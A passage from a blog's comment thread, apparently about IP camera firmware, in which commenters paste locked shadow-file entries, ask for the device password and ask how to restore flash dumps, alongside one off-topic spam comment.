      daemon:*:10933:0:99999:7:::
      nobody:*:10933:0:99999:7:::

      If someone knows the password we will be very grateful.

      Regards

    23. Can someone help on how I restore firmware dumps? (bin files?)

      Thanks!

    24. Please any help.. How i can write back on camera the flash dumps (boot.bin, kernel.bin, rootfs.bin & system.bin)? Thank in advance

    25. Hello there! I know this is kinda off topic but I was wondering if you knew where I could
      locate a captcha plugin for my comment form? I’m using the
      same blog platform as yours and I’m having trouble
      finding one? Thanks a lot!

    Leave a Reply

    Your email address will not be published. Required fields are marked *

    *